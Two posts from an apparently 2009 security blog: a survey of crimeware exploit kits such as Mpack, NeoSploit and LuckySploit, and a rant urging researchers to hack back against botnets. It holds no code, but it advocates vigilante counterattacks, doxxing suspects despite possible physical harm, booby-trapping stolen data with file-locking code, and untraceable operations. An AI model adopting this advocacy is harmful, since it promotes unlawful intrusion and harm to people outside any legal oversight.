Series: Looking through the keyhole – WebAttacker
March 25, 2009
Most believe this is what started it all. Webattacker
Series: Looking through the keyhole – Mpack
March 25, 2009
Mpack is kind of a patriarch to many of the modern crimeware kits, however it is important to know what kicked this whole thing off.
There where many many versions (0.851, 0.91, 0.80)
Here is a screenshot of an Mpack interface. Here is an excellent overview of its backend components.
Panda also wrote an great writeup on it.
Notice how many of these packs have similar interaces, reporting and features, Not much in the way of advanced innovation. They do innovate however slowly through evolutionary methods, not revolutionary. I would thing that if you put real systems engineer design principals behind this you could come up with something way better.
You would think that with the amount of money this stuff pulls in there would be more original development. Then again it works… so why change.
Once again I will be looking for source to post here for research.
Has anyone determined or done any Marketshare studies about these packs. It would be an interesting thing to see how the marketshare percentages play out globally and by Region.
I would like to originate a new Thought Meme on this called “Malicious Product MarketShare”
The goal would be to track the evolutionary phases and trends of these packs and their development, the pricing trends, their percentage of market share by region and globally as well as localization and customization.
Additional trends would be the average number of exploits each includes, inclusion of new features ectera.
Here is an earlier version. Apparently it had not been using Usernames but just passwords.
Apparently Finjin in their research clearly identifies the users of these services as shown here in one of their reports.
This is a perfect example of implementing my Meme of “Open Source Evidence” I bet you any amount of money 2 years later. These individuals met with no penalty whatsoever due to the International excuse and throwing up our hands and saying what can you do…. we dont get cooperation…
Here is what you do Jackasses. Expose them to the light of day and then See what happenss. Do you think that they would be employeed by legitimate companies if they are known criminals? Do you think maybe you could explose them to possible physical harm due to them being outted? Do you think they would be employed by the badguys if they are known to be exposed? IF sufficient light is placed on these people they become worthless due to the fact that they would be potential targets for action. Good or Bad.
If I was a cyber mob boss and my henchmen where exposed I would not want to take the risk of having them compromised and roll on me. So the LESSON of the day is: POST TO THE NET FIRST THE EVIDENCE (Unredacted and its all its true form and glory. THEN notify the authorities or the providers, IF you like. and if its worth it. Probably not worth it if you ask me..
Series: Looking through the keyhole – IcePack
March 25, 2009
IcePack is an older pack. It is supposedly coded by a group call “The IDT Group”
Here is a good writeup of its capabilities. Its a professional job. Great analysis by Dancho here.
Here is some additional analysis by da Panda. Here is an Excellent Writeup on its Entire Capabilities.
Note that most of these packs are Russian in origin and then become localized later in other languages.
I will be looking for the source to post as well as doing research on possible exploits for this. Its possible that many of these packs are going the way of the dodo bird due to Darwin and Natural selection. Adapt or die.
Here are some of its interfaces.
Series: Looking through the keyhole – NeoSploit
March 25, 2009
Neosploit is an oldie but goodie. There are many versions and at one point it had a lot of marketshare. It also was one of the first to be ripped and used / configured by many others. Cannibals eat their own it seems. The effect this has is it drives down exploit pack prices.
It is written in C as a CGI program to be run on a web server. It is possible that it was written by “Grabarz”
Known Versions 3.0.7, 3.1, 2.0.13, 2.0.17, 2.0.15, 2.0, 1.5, 1.0
Supposedly this crew quit development but their source code and legacy will remain as more and more of these crimeware kits are cloned and innovated by others.
I will be searching for the source code of this to make it available for research.
Why? To exploit that’s why. Usually the nubs that run this shit are clueless on how to secure their own systems. Also we can take advantage of backdoors the authors put into to rip the data from the users. No honor among theives of course.
However these decentralized operations are complex to unravel. The problem is that many times researchers do find out who it is, then notify the authorities to no avail.
I am advocating as a Thought Meme the era of Open Source Evidence. What does this mean exactly? It means the active and aggressive publication and publishing of evidence that validates and verifies known malware authors and crimeware authors. The evidence should clearly incriminate said parties. The evidence should be Posted FIRST to the open source in hightraffic blogs and then reported to Authorities.
Law enforcement has had plenty of time to pursue these guys and in their Investigations “keep all hush hush” about the evidence and the personalities and organziations behind this fiasco of a mess. I the mean time victims suffer, with no compensation, retribution, or entity to champion their woes. I have said many times. We are sheep among wolves, and our protectors are down the street, hanging out at MacDonalds.
Here is another screenshot of Neosploit.
Here is some additional detail such as the login page..
These are the sites the criminal compromised with Iframes
Here is a Geographic distribution of the PWNed victims
Series: Looking through the keyhole – Fiesta
March 25, 2009
Series: Looking through the keyhole – AdPack
March 25, 2009
Here is a kit called AdPack. I will begin to start searching for the Source Code or backend code for each of these exploit packs and post them here for Security Research and Analysis. This stuff itself is not dangerous. These are command and control mechanisms to report and monitor botnets.
What IS dangerous is the fact that software and systems do not automatically slipstream vulernability fixes / patches to their users, ensuring that a time gap occurs which gives malicious users the opportunity to exploit systems.
We need to really start rethinking the concepts of software and challenge our traditional assumptions if we are every truly going to make progress in this area.
INTELLIGENCE:
Who coded this, in what language, what is its current black market price, exploitable?
How prevalent or what kind of market share does it have?
What is its backend db?
Apparently there are many configuration vulnerabilities such as weak passwords that can be leveraged to compromise the back end components such as the FTP server, which also may be vulnerable.
What web servers are typically used for these packs? nginx? some other?
Here is a link to some other ADpack screens as well as a C&C Interface for running commands.
As you can see above, if you get access to the command and control site you can destroy the system. Reference the UnInstall Me feature. Get System info is a good way of notifying affected organizations. Clearly they dont understand the concept of Privledged commands and Role based Access Control. Nor is each members campaign usually segregated from other members campaigns thus no privacy per say.
Additionally these kits are like a Service so many users run multiple campaigns. Sounds like STING TIME>
It would be entirely plausible to generate a fake service like this with fake simulated information Lure them in, identify them, then SMASH THEM.
You could provide fake or previously compromised data stores, and simulate the growth of their botnets. It would be all you need to Sow distrust and paranoia into people tempted to get into this line of nefarious work.
Here is what appears to be a localized Russian version of Adpack
Series: Looking through the keyhole – Unique Pack
March 25, 2009
Unique Pack – Unique Sheaf Exploits
NOTE: the possible author of the pack.
Indication of author is not tantamount to owner of pack or operator of pack.
Most of these things are coded collaboratively from many authors and geographic locations.
For perspective this would be a true realization of the distruptive nature of open source software.
The only real intelligence value of these things are:
What unique identifiers are in the kits that could allow for detection. See GOOGLE hacking.
["unique sheaf sploits" "Vparivatel" "All Vpars" "Totals/Loads"]
What language is used, can the implementation be exploited.
How can you pwn the server to monitor usage? Exploitable??
Are the operators stupid enough to connect directly or do they come in via proxied connections such as Tor?
WHERE is the DROP SITE? Can we Trojan the drop site with a payload to track the movement of its data?
Can we poison Pill the data (via Cryptographic attack or assured destruction Secure delete) or the systems that use the data?
Series: Looking through the keyhole – SUTRA
March 25, 2009
So one may ask your self, well anyone can host a page that has exploits. But how do they manage the sheer scale and scope of the attacks we are seeing today. The answer is through sophisticated Traffic Redirectors.
Here is an example of one. It is called SUTRA. It provides for sophisticated reporting and statistics. It basically monitors the traffic that is redirected based on a malicious IFrame placed on a compromised site. The IFrame will then redirect to a exploit page.
SEEKING INTELLIGENCE ON:
Geographic origin of code
Language coded in: CGI possibly PERL
Black Market price range
Forums its marketed on: (Forums/IRC?)
Who the authors are?
Exploitable? TBD
Google identifier search strings.
Code derived from? Progeny.
How long its been in existence?
Number of Versions.
Apparently there are many many of these Traffic Redirector services and even Market based exchanges for this traffic.
Series: Looking through the keyhole – LuckySploit
March 25, 2009
I wanted to demonstrate the level of sophistication that is running the back end Command and Control servers for many of these web based usually p2p botnets. Included are support contracts, fees for advanced services, reporting and sometimes the occasional backdoor! Duh.
As currently shown by the Malware Domain List the following pack is now very popular..
Luckysploit, currently by many analysts to be at the head of the pack in terms of obfuscation and features.
The pack includes dynamically generated runtime creation of obfuscated Javascript in order to establish an encrypted communication session with the browser via asymmetric encryption. The browser then sends its critical info such as user agent type, active x controls, plugins, and platform information.
Based on this exchange of information, the pack sends a crafted exploit JUST FOR THE VICTIM. whee. How special.
Here is the admin page.
Can't have it both ways, I call Shenanigans!
March 17, 2009
I’m calling Shenanigans!
Ok, I’m am starting to get a little pissed. As you know I have been questioning why researchers are not more proactive about taking out botnets and hacking malware and its infrastructure. Common refrains are NONONONO ooooo that would be illegal blah blah blah.
Now see the following.. just from today. There are many more such examples if you troll around.
Here is an article from the highly overhyped Brian Krebs who I think does a good job reporting but really does’nt go far enough in his questions or the depth of levels needed to really discuss the important issues in his articles. Even investigative reporters of the crappy kind go deeper than his content which is sad, because if he chose to do so would dramatically up the level of discussion and populate the idea pool with more useful ideas. He has the audience now he just needs to up his game to be more effective as a thought leader instead of just a reporter. Reporters are boring from a research standpoint and do little to add to the cumulative public knowledge base to really solve problems.
Massive Profits Fueling Rogue Antivirus Market
http://blog.washingtonpost.com/securityfix/
“Prior to site’s demise, security researchers managed to snag a copy of the database for the TrafficConverter affiliate program.”
Now explain to me how they were able to do that without breaking any use laws. I want to be clear here. I am not supporting breaking of laws, I am noting that said laws are used as an excuse to really SOLVE the malware infrastructure problem and support the Security products industries bottom lines.
Based on stuff like this, an alternative is needed for protection… Awesome Title BTW
Storm Worm Botnet Lobotomizing Anti-Virus Programs
Any and all of these attempts would run afoul of some narrow minded anal retentive lawyer and somehow break a computer law somewhere. However the key thing here is authority and intent.
If its illegal to walk on the grass, yet you see a lady getting mugged on the other side of the really nice garden, do you run across the grass and help her or walk ALL the way around and hope that the scumbag does’nt off her and make off with her valuables.
If there is a technical way to disable, subvert, dismantle, neuter, compromise, impact, DOS, surveille a botnet, malware author, cybercrime crew, criminal organization then it should be investigated and done if possible provided it does not make the system inoperable and unusable. The problem here is that you need extremely sophisticated techniques to do so. You cant have a bunch of jackass cybervigilantes running amok and causing more havoc then good.
Actions should be given to competant organizations / researchers based on a validated and widespread threat. Sort of like what a CyberInterpol would do, but we know that will never happen. Essentially what we need is a vetting process whereby through a collaborative cooperative of security responders/researcher get a free pass to conduct offensive surgical strikes on malware infrastructure and Run ops against these crews.
Here is an attempt to attack Storm that was dead on arrival because there was no will and balls behind the effort.
Result would be degradations of malware infrastructure, sowing distrust and discord among organizations, infiltration through stings, paying rival organizations to rat out their competitors, higher bounties, snatch and grab operations, poison pilled exfiltration data from high level targets, arrest and PREEEESSSUREEEE on the low level schmucks to roll on their buddies, leadership chain attacks, exploitation of malware binaries to render them inert, integrity attacks on command and control channels to render them disrupted or get them to disable or delete themselves, updating the malware do doing something beneficial like disable functions or change its communication mechanism so it is no longer reachable by its command and control at all. The field is WIDE OPEN for research to discuss and innovate but do you see it being done?? NO. I repeat NO>
And thats why I am calling SHANANIGANS on the whole lot of them. When people ever bring the subject up they give you the standard BS responses, however in the background they do things as shown in the previous articles that would clearly be construed as illegal.
I am calling for a Cyber Free Fire Zone.
For example. Make a law that says that all machines that are compromised and attacked, entitle the user or its designated parties via a special use license to make any modifications or actions against said invading party. This basically protects the user from legal recourse and could fall under reasonable cyber self defense guidelines. If you come into my house to steal my Playstation 3 or rape my wife I am going to beat the shit out of you. Or worse in the second case, however if you come in to my computer and steal my vital data or work and compromise my identity or cause me extreme financial hardship I have no recourse and cant to anything?!?!
Now people that just doesnt make sense. From the goverment side we need a Cyber Monroe doctrine which I believe is a great idea. As well if you look at the statistics, many many of the malware operations are run from inside the United States to I dont believe for a second, that our laws long arms cant reach into Pukipsee.
A person who I know well, Lenny Seltser who teaches courses for SANS on malware analysis (SANS 610) posted recently a “counter argument” that while has important points I respectfully disagree with. I think you need to weigh the consequences between an active response and the impact of not acting. That is the ethical equation. If you can do more good then harm, you should serious consider the action.
Here some more on the BBC incident. Unfortunately I do not see many advocating any counter malware actions, not to my suprise because that is the status quo.
So what do we do? Prosecute security researchers for their intelligence actions that they try and keep on the downlow, while at the same time espousing support for the rule of law? I dont advocate that. I advocate the declaration of a Cyber Free Fire Zone, Establishment of a Cyber Monroe Doctrine, Creation of a counterhack implied user license for legal protection, and enhanced and publised experimentation and surgical counterstrike actions being conducted as I have stipulated above.
BBC Program Purchases Botnet, Touches Off Ethical Debate
BBC Responds to Botnet Controversy
Here is an interesting first step from Britian at least attempting to solve the problem, however present much opportunity for abuse and is only allowed by law enforcement which defeats the purpose and overall goal. Regardless, Britian with all its security incidents is really in no way shape or form qualified to lead in security research or cyber actions due to its nightmareish list of compromises and general cyber ignorance from its military, goverment and intel sections.
Here is another example
Spam Botnet Taken Over By Good Guys: Now What?
Gee Boss, now whut?? (Scratches his head) The answer is focused collaborative research on cyber course of actions. DUH! Thats what the military does all the time. Establish course of actions against an enemy’s order of battle. The acts. No action here….
Here is another example from the Prevx group
Stolen-data trove offers look inside a botnet
Now how could researchers obtain this and not break the law? Why was this box not infiltrated and monitored to prosecute, track and punish the people that connect and download said purloined information.
“Caches of stolen data like these are hidden throughout the Internet, usually locked away inside password-protected websites or heavily fortified servers. Prevx’s researchers were able to infiltrate this site because it was protected with poor encryption.”
- Cut the bullshit about not being able to do something as a security researcher and whining about laws. Researchers are already doing it. however they are at risk of prosecution so this debate is about empowering them by giving them cover or implied authority. A digital RobinHood / Zorro if you will.
I think the fact of the matter is, researchers dont want anyone else to do it, so use the cover of the law to keep public debate to a minimum. As well, alot of their SENSOR networks and compromised honeypots used for intelligence yet are members of said botnets are operational and doing everything a full member of a botnet would be doing such as DDOS and spam. Maybe even SqL injection attacks ala ASPROX.
It would be nice if guys who had the balls like Offensivecomputing had the same initiative and championed these counter cyber attack research options through public debate. Currently right now I would imagine it is only debated in Military and Intel communities but those organizations are so hamstrung with policies and bullshit that I doubt anything rarely gets accomplished, or its not in their domain, or they just dont care.
FBI included. They have only limited resources ya know and threshold for what warrants attention. “So what you got hacked and lost 10grand to a russian guy who drained your brokerage account. Go call the local PD. Dial 911, Operator, whats the emergency. Caller- some guy just hacked my computer and stole 10 grand from my brokerage account. Operator, thats not an emergency. Police officer status not my problem, call the FTC.” _get_THE_PICTURE?
“The website that Prevx found, which was operating on a server in Ukraine, was still online for nearly a month after security researchers alerted the Internet service provider and law-enforcement authorities. The site was sucking up data from 5,000 newly infected computers each day.” – wow no action, i am not suprised…
They should have realized abuse complaints in that part of the world go straight to the bit bucket…. duh.. Next time act. compromise the data in the trove with beacons and find the real culprits, put crypto attack code in the documents so that whoever opens them gets their files cryptolocked with a Secret key and a message to contact a POC to get your files unlocked. Other avenues of action are or could be equally disruptive and intersting. Send the badguys information and keystrokes back to the victim.
Here is another great example of retarded action.
Kraken the botnet: The ethics of counter-hacking
Two awesome researchers did excellent innovative work. Then what happened. NOTHING. Great job management. Next time set up a Skunkworks unattibutable group with resources that are untraceable and Fucking Do it. Then destroy all traces of said action. In the current environment this is the only recourse for real action. Someone needs to stick their dick in the pool first. Whose it going to be. O yea right. Your not supposed to find out. Sorry you wont get the credit but youll be the one smiling in the room when its discussed…..
Pretty soon we need to start dealing with these issues effectively and dealing with the likes of these.
Or we can start expecting our data and vital operations to look like this…
